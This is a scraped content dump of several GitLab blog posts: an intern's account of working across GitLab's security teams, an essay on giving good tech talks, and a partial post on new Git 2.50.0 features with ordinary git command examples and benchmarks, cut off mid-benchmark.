\n\n### Q: How should I choose between GitLab Flow and GitFlow? \n\nA: Git Flow, due to its structure, is well-suited for large projects with clearly defined development stages. GitLab Flow, being more agile, is better suited for projects that prioritize continuous delivery and rapid releases. \n\n## Get started with GitLab\n\nStart your [free, 60-day trial of GitLab Ultimate and GitLab Duo Enterprise](https://about.gitlab.com/free-trial/) today!\n",[751,9],{"slug":5251,"featured":6,"template":689},"what-is-gitflow","content:en-us:blog:what-is-gitflow.yml","What Is Gitflow","en-us/blog/what-is-gitflow.yml","en-us/blog/what-is-gitflow",{"_path":5257,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5258,"content":5264,"config":5270,"_id":5272,"_type":14,"title":5273,"_source":16,"_file":5274,"_stem":5275,"_extension":19},"/en-us/blog/what-its-like-to-intern-in-gitlab-security",{"title":5259,"description":5260,"ogTitle":5259,"ogDescription":5260,"noIndex":6,"ogImage":5261,"ogUrl":5262,"ogSiteName":673,"ogType":674,"canonicalUrls":5262,"schema":5263},"What it's like to intern on the GitLab Security team","I spent 16 weeks interning across the GitLab security department and here’s what I learned","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672427/Blog/Hero%20Images/cgower_desk.jpg","https://about.gitlab.com/blog/what-its-like-to-intern-in-gitlab-security","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What it's like to intern on the GitLab Security team\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Juliet Wanjohi\"}],\n        \"datePublished\": \"2020-08-13\"\n      }",{"title":5259,"description":5260,"authors":5265,"heroImage":5261,"date":5267,"body":5268,"category":951,"tags":5269},[5266],"Juliet Wanjohi","2020-08-13","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nBetween May and August 2020, I had the wonderful opportunity of being part of 
the [Engineering Internship Pilot Program](/handbook/engineering/internships/). Specifically, I was an intern in the [Security department](/handbook/security/) at GitLab. This was my first [all-remote](/company/culture/all-remote/guide/) role, and I must say it was an extremely worthwhile experience. 😄\n\nGetting to work remotely at GitLab offered a lot of flexibility as I could choose my own working hours where I was most productive, and at the same time learn how to become a [manager of one](https://handbook.gitlab.com/handbook/values/#managers-of-one) in my day-to-day tasks. Additionally, due to the team being fully-distributed, I was able to meet and collaborate with a diverse group of individuals from all over the world. The team was very helpful each step of the way, and I could always reach out to my manager and mentors if I required any assistance. What surprised me the most was that I was able to have chats with senior leadership in GitLab, which I think is great since one may not have such opportunities in a normal office setup.\n\nThe internship enabled me to grow exponentially in different aspects: technical skills, accountability, and within the [GitLab values](https://handbook.gitlab.com/handbook/values/) of collaboration, efficiency and transparency to name but a few areas. \n\n## Cross-functional exposure and understanding\nA goal for my internship experience was to gain exposure to different security teams and develop an understanding of the key functions performed to ensure and enhance the overall security posture of GitLab. \n \nGitLab’s [Security department](/handbook/security/) is organized around three key tenets that drive the structure and activities of the group, including: secure the product, protect the company and assure the customer. 
I had the opportunity to work across each of these teams and want to share some key learnings from each rotation.\n\n### Securing the product\nThis team works closely with engineering and product teams to ensure that all GitLab products securely handle the customer data with which we are entrusted. I was able to work with the teams in the [Application Security](/handbook/security/security-engineering/application-security/), [Security Research](/handbook/security/#security-research) and [Security Automation](/handbook/security/security-engineering/automation/) functions to gain a deeper appreciation of how they ensure all aspects of GitLab exposed to customers or that host customer data are held to the highest security standards.\n\nWorking with security engineers on our [Application Security](/handbook/security/security-engineering/application-security/) team, I had the chance to contribute directly to GitLab the product! 🎉  This involved [improving the current path traversal checks](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/33114) on user controlled file names and file paths. It was a collaborative effort between myself and other engineers through multiple code reviews and iterations that also helped me to sharpen my skills in coding with Ruby and produce well-written tests. Furthermore, I was able to triage a couple of reports in [GitLab’s bug bounty program](https://hackerone.com/gitlab). This enabled me to learn more about vulnerability identification and how the team handles bug reports from the first stage, where a bug is reported, to the last stage, where a security release is created to fix the bug. By reviewing past issues that the Application Security team had handled, I was able to develop a better understanding of the [security fix process](/handbook/security/#vulnerability-reports-and-hackerone). 
With respect to ‘shift left’, this enabled me to see how the team collaborates with other engineering and product teams to integrate security early in the development process by carrying out code security reviews on features.\n\nIn addition, I had pairing sessions with members of the [Security Research](/handbook/security/security-engineering/security-research/) team where I was able to learn about different bug-hunting approaches and current security vulnerability research areas being undertaken such as SAST/DAST tooling and dependency scanning. We also worked together to solve a couple of challenges from the 2020 GitLab capture the flag (CTF). Read about the CTF in [“How to play GitLab's Capture the Flag at home”](/blog/how-to-play-gitlab-ctf-at-home/) and try your hand!\n\nThe time I spent working with the [Security Automation](/handbook/security/security-engineering/automation/) team exposed me to the SaaS infrastructure that GitLab relies on with a special emphasis on Google Cloud Platform (GCP). I collaborated with another security engineer to design and implement automation efforts to assist with the management of anomalous resources in GCP, and further assist with the triage process of the reports on these resources.  
Through [coffee chats](/company/culture/all-remote/informal-communication/#coffee-chats) with the rest of this team, I was able to gain an understanding of the current Security Automation initiatives surrounding the building of tools and services geared towards increasing efficiency and assisting other security teams in their work.\n\n### Protect the company\nThis group is responsible for “[shoring up and maintaining the security posture of GitLab.com to ensure enterprise-level security is in place to protect our new and existing customers](/handbook/security/#protect-the-company)” and I was fortunate to work across all three functional areas within this group: [Security Incident Response Team](/handbook/security/#sirt---security-incident-response-team-former-security-operations) (SIRT), [Trust and Safety](/handbook/security/#trust--safety) team and [Red Team](/handbook/security/threat-management/red-team/).\n\nWorking with the SIRT team was exciting as I got to learn how security incidents are managed by shadowing the security engineers on-call. This can be a very time-sensitive and fast-paced operation as incidents need to be handled quickly, but at the same time, precisely to avoid any further escalations. Additionally, I had the privilege to work with the team to help create detection rules using Python; I particularly enjoyed this since one of my favorite aspects of software engineering is coding! This gave me insight into how we can proactively detect threats in our environment and design appropriate response approaches.\n\nThe [Trust and Safety](/handbook/security/#trust--safety) team’s main objective is to ensure that GitLab.com is not abused by malicious users. I was able to contribute to this team’s efforts by developing an algorithm that could help to detect [file obfuscation](https://attack.mitre.org/techniques/T1027/), which is a trending abuse methodology used to hide malicious content. 
This was particularly interesting as we got to leverage the power of machine learning in the security domain. More about this project can be seen further down in this post!\n\nGitLab’s Red Team actively examines the security posture of the organization by carrying out exercises to establish threat models and escalate any security gaps that may be discovered during testing. My time spent on this team gave me the opportunity to get the team members’ perspectives on what it takes to be a ‘Red Teamer’ and how they support GitLab’s value of transparency in their day-to-day work. An interesting project that I was able to contribute to involved research on a machine learning algorithm that can help with secret scanning in GitLab repositories. This proof-of-concept was geared towards reducing the large number of false positives in the current state-of-the-art secret searching tools.\n\n### Assure the customer\nThis sub-department focuses on the mission to [“provide assurance to GitLab customers that any data shared with GitLab will be kept safe and our customer's privacy will be respected”](/handbook/security/security-assurance/) and includes the functions and subteams of [Field Security](/handbook/security/security-assurance/field-security/) and [Security Compliance](/handbook/security/security-assurance/security-compliance/).\n\nInterning within this group was a unique experience for me as I had not yet had the chance to try my hand at a [security analyst](https://handbook.gitlab.com/job-families/security/security-analyst/) role. Through this engagement, I gained visibility into how risk and compliance relate to the bigger security picture and became familiar with the various security compliance certifications and their relationship to the internal [GitLab Control Framework](/handbook/security/security-assurance/security-compliance/sec-controls.html). 
Specifically, I was able to look at the SOC2 industry standard and help to test controls such as data management, with respect to current vendor security review assessments.\n\n## A deeper dive: machine learning in security\n\nAs part of my internship here, I had the opportunity to focus more deeply on an area of specific interest to me: machine learning. GitLab is actively pursuing novel ways of integrating machine learning into its overall security model. Machine learning can offer multiple benefits in security-based use cases including detection of malicious activity and automation of repetitive security tasks. \n\nAs part of the anti-abuse efforts ongoing at GitLab, senior security engineer in Automation, [Melissa Rodriguez](https://gitlab.com/melissar) and I worked on creating an algorithm that could help to detect obfuscation in certain files. This involved research and learning how to build models that could find patterns in text, and using this to correctly classify regular files versus obfuscated files. I'm proud to say the algorithm I helped to develop with Melissa is going to be used in the detection of abusive activities such as cryptomining, where attackers tend to obfuscate their mining configurations.\n\nMachine learning is a fast-growing trend that has a myriad of applications in the security space, and it is important to consider how to take advantage of it to improve overall security posture and better protect customers.\n\n## Interested in joining GitLab?\nIf you would like to be a part of this amazing team and get to contribute to the GitLab product while enjoying the perks of all-remote, check out the [career opportunities](/jobs/) page and join our [talent community](https://boards.greenhouse.io/gitlab/jobs/4700367002?gh_src=d865c64f2us). 
You can also learn more about GitLab’s [culture](/company/culture/) and [values](https://handbook.gitlab.com/handbook/values/) in order to get an understanding of what it might be like to work here!\n\n\nCover image by [Christopher Gower](https://unsplash.com/@cgower) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[865,803,9],{"slug":5271,"featured":6,"template":689},"what-its-like-to-intern-in-gitlab-security","content:en-us:blog:what-its-like-to-intern-in-gitlab-security.yml","What Its Like To Intern In Gitlab Security","en-us/blog/what-its-like-to-intern-in-gitlab-security.yml","en-us/blog/what-its-like-to-intern-in-gitlab-security",{"_path":5277,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5278,"content":5284,"config":5289,"_id":5291,"_type":14,"title":5292,"_source":16,"_file":5293,"_stem":5294,"_extension":19},"/en-us/blog/what-makes-a-great-tech-talk",{"title":5279,"description":5280,"ogTitle":5279,"ogDescription":5280,"noIndex":6,"ogImage":5281,"ogUrl":5282,"ogSiteName":673,"ogType":674,"canonicalUrls":5282,"schema":5283},"What makes a great tech talk?","I've compiled some of my favorite tech talks to find out what makes them great.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670658/Blog/Hero%20Images/data-startup-cognitive-logic-talks-migrating-to-gitlab.jpg","https://about.gitlab.com/blog/what-makes-a-great-tech-talk","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What makes a great tech talk?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brendan O'Leary\"}],\n        \"datePublished\": \"2022-10-04\"\n      }",{"title":5279,"description":5280,"authors":5285,"heroImage":5281,"date":5286,"body":5287,"category":682,"tags":5288},[1074],"2022-10-04","\n\nAs someone who spends a reasonable amount of time writing, rehearsing, and giving tech talks, I often find folks new to speaking about tech asking me: how do you do it? 
How do you know that you will be able to write and give an excellent tech talk?\n\nThe simple answer is: I don't know. An excellent tech talk isn't definable and solvable like an engineering problem. It's part tech, part passion, part storytelling, and part luck. But in thinking about speakers and talks that I've looked up to throughout the years, I believe that I've found a few key ingredients in any tech talk that I've seen and would consider \"great.\"  In reviewing these, I actually came to appreciate what I somewhat already knew: the \"tech\" part of the talk is probably the least important part of a great tech talk. Yet, as professionals, that is what we get wrapped around. And it is what worries us when writing a speech. The best demo ever - that's what will save my talk! But in the end, it's not just the tech content that counts, so let's look at the five critical ingredients for a great tech talk:\n\n- Story and narrative\n- Passion\n- Connection to the audience\n- Balance\n- Call to action\n\nFor each ingredient, I've included a talk that best illustrates that principle and a link to the talk. As an aside, every moderately good talk I've ever written was inspired while listening to or after hearing a great talk from one of these amazing technologists. Remember: [good artists copy, great artists steal](https://www.youtube.com/watch?v=a6jeZ7m0ycw).\n\n## Story and narrative\n\n[Keynote: Reflections](https://www.youtube.com/watch?v=jiaLsxjBeOQ): **Kelsey Hightower, KubeCon CloudNativeCon North America 2019**\n\nStories are how humans have always learned and taught each other. From the earliest stories around campfires to teach about the dangers of predators or the ways to find food to the modern world where we are bombarded by stories that we now call 'marketing' - stories have always played a pivotal role in learning and teaching.\n\nAnd so, without a story, your audience is already lost. 
You can show some of the most incredible technology, a fantastic demo, and wow people with statistics...but if there is no connection to the real world - to their lives - then it will go in one ear and out of the other. And the story doesn't have to be complicated - a story is, after all, just a beginning, middle, and an end...maybe a conflict or two. But telling the story - showing how the technology or what you are presenting applies to real people in the real world - is critical to getting your point across.\n\nIt's so critical that some of the best tech talks are only stories. In the \"Reflections\" Keynote at KubeCon CloudNativeCon 2019, Kelsey Hightower - one of the most respected tech speakers known for his impressive and fun demos - didn't even appear to bring a laptop on stage. Speaking from the heart, Kelsey tells the stories of the early days of Kubernetes, of showing inclusion, of practicing intentional inclusion. And with those few simple but powerful stories, the audience is captivated and learns more in 15 minutes about what it means to be an inclusive open source community than they would have with hours of slides of fancy graphics and data.\n\n### More from Kelsey\n\n- [Kubernetes and the Path to Serverless](https://www.youtube.com/watch?v=oNa3xK2GFKY)\n- [Kelsey Hightower's Best Live Demo Yet](https://www.youtube.com/watch?v=U6SfRPwTKqo)\n- [TechExplorers: Kelsey Hightower](https://www.youtube.com/watch?v=9OHNejqXOoo)\n- [HashiConf 2017 Keynote](https://www.youtube.com/watch?v=v77FFbQwC6E)\n\n## Passion\n\n**[Zebras All the Way Down](https://www.youtube.com/watch?v=fE2KDzZaxvE): Bryan Cantrill, Uptime 2017**\n\nStories will help you make your talk more personal - both for you and the audience. But that won't carry much weight for long if you don't have passion for the stories and how they apply to the problem and solution you're trying to present. 
For the audience to stay engaged throughout the talk, they need to care about what you are talking about. And if it isn't clear from your speech, word choice, and energy that you are passionate about your topic, there is no way your audience will come along with you and care about what you have to say.\n\nNo one will ever accuse Bryan Cantrill of not being passionate. And in his talk \"Zebras All the Way Down,\" he brings that passion to advocating for one's own healthcare to understand at a deep level how our systems are impacted by the various layers of software. And that includes a lot of software we don't think about like that below the operating system. Turning a personal story about his physician father and his sister who had a rare condition into the way to think about solving hard debugging problems, Bryan brings the audience along. He makes you care about what he has to say...even if what he's talking about is far removed from your daily work.\n\n### More from Bryan\n\n- [Debugging Under Fire: Keep your Head when Systems have Lost their Mind](https://www.youtube.com/watch?v=30jNsCVLpAE)\n\n- [Corporate Open Source Anti-patterns](https://www.youtube.com/watch?v=Pm8P4oCIY3g)\n\n- [Fork Yeah! The Rise and Development of illumos](https://www.youtube.com/watch?v=-zRN7XLCRhc)\n\n## Connection to the audience\n\n**[Why Open Source Firmware is Important](https://www.youtube.com/watch?v=mUTx61t443A): Jessie Frazelle, GOTO 2019**\n\nOnce you've brought your whole self to the talk - your stories and your passion - you still need to ensure your audience will be engaged and want to hear about those things from you. To do that, you have to build a connection with your audience. The way to do this may seem simple on the surface, but it does actually take some effort. You need to understand at least two things about your audience: who they are and why they showed up to your talk.\n\nFirst - who is your audience? 
You have to understand who they are - what are their roles professionally? What is their experience like personally? What makes them passionate, and what are their stories? Understanding your audience will help you shape your talk to match their interests with your passions - a surefire method for success.\n\nSecond - why did they show up to your talk? You've already won a little bit here - they came to the conference or meetup, they saw your abstract and maybe a little bit about you, and chose to come to hear what you had to say. That should give you confidence that the audience wants you to succeed just as much as you want. Think for yourself: have you ever shown up to a tech talk hoping the speaker would bomb? Probably not. So that's half of the battle won already, but you can't take it for granted. They showed up expecting to learn or get something out of your talk. You need to think about how they apply what they want out of it and then deliver.\n\nA great example is Jessie Frazelle's talk at GOTO Chicago in 2019 on \"Open Source Firmware.\" On the surface, it might not seem like a great example - Jessie even has a disclaimer at the beginning of the talk. She's \"forcing\" an audience of software engineers to get a few rings lower than they are comfortable - down into the  UEFI kernel, management engine, and other low-level firmware pieces. But Jessie's passion for this part of the stack and showing the audience how it directly applies to how we all build software with many abstraction layers above the firmware is offered throughout the talk. Jessie convinces the audience to care about the software turtles all the way down. 
Along the way, she teaches about the stack of code we don't know about...and the rings of trust below \"0\" and the kernel.\n\n### More from Jessie\n\n- [Breaking Containers: Chaos Engineering and Kubernetes](https://www.youtube.com/watch?v=1hhVS4pdrrk)\n\n- [Benefits of isolation provided by containers](https://www.youtube.com/watch?v=fKDupfKu_Mw)\n\n- [Container Hacks and Fun Images](https://www.youtube.com/watch?v=cYsVvV1aVss)\n\n## Balance\n\n**[The Art of Code](https://www.youtube.com/watch?v=6avJHaC3C2U): Dylan Beattie, NDC London 2020**\n\nOnce you've got your audience bought in - and know what you're going to tell them and why - you've got to write the talk. Until now, not much has been focused on that. There are a lot of methods out there for outlining, writing, and structuring your speech. Far too many, in fact, for me to get into here. And that's not my goal - there is no one-size-fits-all method for creating a great tech talk. Much like many technical problems, the answer to \"how should I structure this thing\" is \"it depends.\" However, the best tech talks I've ever seen strike a balance - a balance of the tech and the stories, learning and entertainment, questions and answers.\n\nThis balance boils down to balancing the \"three S's of a great tech talk\":\n\n_Style_\n\n_Substance_\n\n_Stories_\n\nEven though one of these S's (stories) repeats one of our early items, I think that only serves to express how important it is to a great talk. You must tell a story. But unless you're giving a keynote at a conference where you're the most respected person in the room (shoutout to Kelsey Hightower), the stories won't always be the whole package. In most tech talks, folks are coming to learn something about technology or how humans interact with technology - so bringing substance is essential. 
You have to prove you know what you're talking about and that it matters to your audience.\n\nBut, as we've discussed already, that substance can't be just dry numbers on a chart or some other way to present cold unconnected data. While that is often the business of any serious engineering endeavor, a presentation on stage is more than that. You must also bring style - charisma, humor, fun visuals, and passion - all ways you can make sure style is balanced with the substance of your talk. Sure, some have a lot more style than others - but those with no style are the ones that are quickly forgotten.\n\nPerhaps one of the best speakers when it comes to this balance is Dylan Beattie. In \"The Art of Code,\" Dylan takes us through various elements - from maths to retro computing to programming Fizz Buzz as an 80's hair ballad, complete with guitar playing and singing from Dylan. However, Dylan balances the exciting talk style with the stories he wants the audience to hear. And he sprinkles in the substance about how we as technologists have a responsibility to the world...and need to not take ourselves too seriously.\n\n### More from Dylan\n\n- [Fractals, Factories and Fast Food](https://www.youtube.com/watch?v=Vs1DWYrw2Ps)\n\n- [Architecture: The Stuff That's Hard to Change](https://www.youtube.com/watch?v=3LtQWxhqjqI)\n\n- [Ctrl-Alt-Del: Learning to Love Legacy Code](https://www.youtube.com/watch?v=wPjHuvulivM)\n\n## Call to Action\n\n**[Why work doesn't happen at work](https://www.ted.com/talks/jason_fried_why_work_doesn_t_happen_at_work/transcript?language=en): Jason Fried, TEDx Midwest**\n\nThis last key - a meaningful call to action - is the one I struggled the most to name. As they say, there are only two hard things in software development: naming things, cache invalidation, and off-by-one errors. The connotation behind \"call to action\" may come off at first as sounding too \"sales and marketing\" like many software engineers. 
But that connotation does not impact the importance of a call to action. Using the strictest definition of the word, it is a vital part of your talk.\n\nAs we discussed, your audience came to your talk, hoping for you to succeed. They've now sat through you talking \"at\" them for 15, 25, 45 minutes or more. So the call to action is not for you - it's not self-serving like a sales pitch. Your call to action at the end of your talk should be your gift to the audience. It should be about them, not about you. It should give them concrete next steps they can take to positively impact what you were talking about in their own lives, organization, or world. This call to action is what you want the audience to remember, and the best tech talks are also the most memorable.\n\nAnd they don't have to be about tech at all even. In Jason Fried's TEDx talk \"Why work doesn't happen at work,\" Jason presents the main ideas around how we've become accustomed to working together are broken...and, more importantly, offers concrete ways to fix them. And while those calls to action are simple, they also go to the heart of Jason's story and passion: making it less crazy at work by freeing up people to do their best work with time and space.\n\n## What's next?\n\nSo, given that you've come this far, I hope I've shared my passion for great tech talks with you. Hopefully, that passion is shared, and you've found a new way of thinking about your own talks. So what is my gift to you for having come this far? Well, it's going to sound like an oversimplified call to action, but I'm telling you it's exactly what you should do:\n\n**Go give a talk!**\n\nYour unique stories are valuable. You are passionate about things that others should care more about. There are audiences out there - in meetups, small events, or large conferences  - that want to hear what you have to say and will be rooting for you when you get up in front of them. 
All that's left is to strike a balance between those stories and substance with some of your own personal style to make it exciting and engaging.\n\nSo go forth, and write that talk. I'm confident you can do it.\n",[1078,267,9],{"slug":5290,"featured":6,"template":689},"what-makes-a-great-tech-talk","content:en-us:blog:what-makes-a-great-tech-talk.yml","What Makes A Great Tech Talk","en-us/blog/what-makes-a-great-tech-talk.yml","en-us/blog/what-makes-a-great-tech-talk",{"_path":5296,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5297,"content":5300,"config":5308,"_id":5310,"_type":14,"title":5311,"_source":16,"_file":5312,"_stem":5313,"_extension":19},"/en-us/blog/what-s-new-in-git-2-50-0",{"noIndex":6,"title":5298,"description":5299},"What’s new in Git 2.50.0?","Here are contributions from GitLab's Git team and the Git community such as the git-diff-pairs(1) command and git-update-ref(1) option to perform batched reference updates.",
GitLab shows diffs in various places, but the most\ncommon place is a merge request's [\"Changes\" tab](https://docs.gitlab.com/user/project/merge_requests/changes/).\nBehind the scenes, diff generation is powered by\n[`git-diff(1)`](https://git-scm.com/docs/git-diff). For example:\n\n```shell\n$ git diff HEAD~1 HEAD\n```\n\nThis command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. For large change sets, it would be better if\nthere were a way to break diff computation into smaller, more digestible chunks.\n\nOne way this can be achieved is by using\n[`git-diff-tree(1)`](https://git-scm.com/docs/git-diff-tree) to retrieve info\nabout all the changed files:\n\n```shell\n$ git diff-tree -r -M --abbrev HEAD~ HEAD\n:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc\n:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN\n```\n\nGit refers to this output as the [\"raw\" format](https://git-scm.com/docs/git-diff-tree#_raw_output_format).\nIn short, each line of output lists filepairs and the accompanying metadata\nabout what has changed between the start and end revisions. Compared to\ngenerating the \"patch\" output for large changes, this process is relatively\nquick and provides a summary of everything that changed. This command can optionally perform rename detection by  appending the `-M` flag to check if identified changes were due to a file rename.\n\nWith this information, we could use `git-diff(1)` to compute each of the\nfilepair diffs individually. 
For example, we can provide the blob IDs\ndirectly:\n\n```shell\n$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f\n```\n\nWe can repeat this process for each of the filepairs, but spinning up a\nseparate Git process for each individual file diff is not very efficient.\nFurthermore, when using blob IDs, the diff loses some contextual information\nsuch as the change status, and file modes which are stored in with the parent\ntree object. What we really want is a mechanism to feed \"raw\" filepair info and\ngenerate the corresponding patch output.\n\nWith the 2.50 release, Git has a new built-in command named\n[`git-diff-pairs(1)`](https://git-scm.com/docs/git-diff-pairs). This command\naccepts \"raw\" formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be\nused:\n\n```shell\n$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z\n```\n\nWhen used in this manner, the resulting output is identical to using `git-diff(1)`.\nBy having a separate command to generate patch output, the \"raw\" output from\n`git-diff-tree(1)` can be broken up into smaller batches of filepairs and fed to separate\n`git-diff-pairs(1)` processes. This solves the previously mentioned scalability\nconcern because diffs no longer have to be computed all at once. Future GitLab\nreleases could build upon this mechanism to improve diff\ngeneration performance, especially in cases where large change sets are\nconcerned. For more information on this change, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/20250228213346.1335224-1-jltobler@gmail.com/).\n\n_This project was led by [Justin Tobler](https://gitlab.com/justintobler)._\n\n## Batched reference updates\n\nGit provides the [`git-update-ref(1)`](https://git-scm.com/docs/git-update-ref)\ncommand to perform reference updates. 
When used with the `--stdin` flag,\nmultiple reference updates can be batched together in a single transaction by\nspecifying instructions for each reference update to be performed on stdin.\nBulk updating references in this manner also provides atomic behavior whereby a\nsingle reference update failure results in an aborted transaction and no\nreferences being updated. Here is an example showcasing this behavior:\n\n```shell\n# Create repository with three empty commits and branch named \"foo\"\n$ git init\n$ git commit --allow-empty -m 1\n$ git commit --allow-empty -m 2\n$ git commit --allow-empty -m 3\n$ git branch foo\n\n# Print out the commit IDs\n$ git rev-list HEAD\ncf469bdf5436ea1ded57670b5f5a0797f72f1afc\n5a74cd330f04b96ce0666af89682d4d7580c354c\n5a6b339a8ebffde8c0590553045403dbda831518\n\n# Attempt to create a new reference and update existing reference in transaction.\n# Update is expected to fail because the specified old object ID doesn’t match.\n$ git update-ref --stdin \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nfatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c\n\n# The \"bar\" reference was not created.\n$ git switch bar\nfatal: invalid reference: bar\n```\n\nCompared to updating many references individually, updating in bulk is also\nmuch more efficient. While this works well, there might be certain\ncircumstances where it is okay for a subset of the requested reference updates\nto fail, but we still want to take advantage of the efficiency gains of bulk\nupdates.\n\nWith this release, `git-update-ref(1)` has the new `--batch-updates` option,\nwhich allows the updates to proceed even when one or more reference updates\nfails. 
In this mode, individual failures are reported in the following format:\n\n```text\nrejected SP (\u003Cold-oid> | \u003Cold-target>) SP (\u003Cnew-oid> | \u003Cnew-target>) SP \u003Crejection-reason> LF\n```\n\nThis allows successful reference updates to proceed while providing context to\nwhich updates were rejected and for what reason. Using the same example\nrepository from the previous example:\n\n```shell\n# Attempt to create a new reference and update existing reference in transaction.\n$ git update-ref --stdin --batch-updates \u003C\u003CEOF\n> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc\n> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c\n> EOF\nrejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided\n\n# The \"bar\" reference was created even though the update to \"foo\" was rejected.\n$ git switch bar\nSwitched to branch 'bar'\n```\n\nThis time, with the `--batch-updates` option, the reference creation succeeded\neven though the update didn't work. This patch series lays the groundwork for\nfuture performance improvements in `git-fetch(1)` and `git-receive-pack(1)`\nwhen references are updated in bulk. For more information, check the\n[mailing-list thread](https://lore.kernel.org/git/20250408085120.614893-1-karthik.188@gmail.com/).\n\n_This project was led by [Karthik Nayak](https://gitlab.com/knayakgl)._\n\n## New filter option for git-cat-file(1)\n\nWith [`git-cat-file(1)`](https://git-scm.com/docs/git-cat-file), it is possible\nto print info for all objects contained in the repository via the\n`--batch-all-objects` option. 
For example:\n\n```shell\n# Setup simple repository.\n$ git init\n$ echo foo >foo\n$ git add foo\n$ git commit -m init\n\n# Create an unreachable object.\n$ git commit --amend --no-edit\n\n# Use git-cat-file(1) to print info about all objects including unreachable objects.\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ntree 205f6b799e7d5c2524468ca006a0131aa57ecce7\nblob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nIn some situations, a user might want to search through all objects in the\nrepository, but only output a subset based on some specified attribute. For\nexample, if we wanted to see only the objects that are commits, we could use\n`grep(1)`:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nWhile this works, one downside with filtering the output is that\n`git-cat-file(1)` still has to traverse all the objects in the repository, even\nthe ones that the user is not interested in. This can be rather inefficient.\n\nWith this release, `git-cat-file(1)` now has the `--filter` option, which only\nshows objects matching the specified criteria. This is similar to the option of\nthe same name for `git-rev-list(1)`, but with only a subset of the filters\nsupported. The supported filters are `blob:none`, `blob:limit=`, as well as\n`object:type=`. 
Similar to the previous example, objects can be filtered by\ntype with Git directly:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'\ncommit 0b07e71d14897f218f23d9a6e39605b466454ece\ncommit c999f781fd7214b3caab82f560ffd079ddad0115\n```\n\nNot only is it convenient for Git to handle the processing, for large\nrepositories with many objects, it is also potentially more efficient. If a\nrepository has bitmap indices, it becomes possible for Git to efficiently\nlookup objects of a specific type, and thus avoid scanning through the\npackfile, which leads to a significant speedup. Benchmarks conducted on the\n[Chromium repository](https://github.com/chromium/chromium.git) show\nsignificant improvements:\n\n```text\nBenchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter\n   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]\n   Range (min … max):   73.936 s … 89.690 s    10 runs\n\nBenchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag\n   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]\n   Range (min … max):    18.2 ms …  23.6 ms    127 runs\n\nBenchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit\n   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]\n   Range (min … max):    1.541 s …  1.566 s    10 runs\n\nBenchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree\n   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]\n   Range (min … max):   11.114 s … 11.245 s    10 runs\n\nBenchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob\n   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]\n   Range (min … max):   62.836 s … 
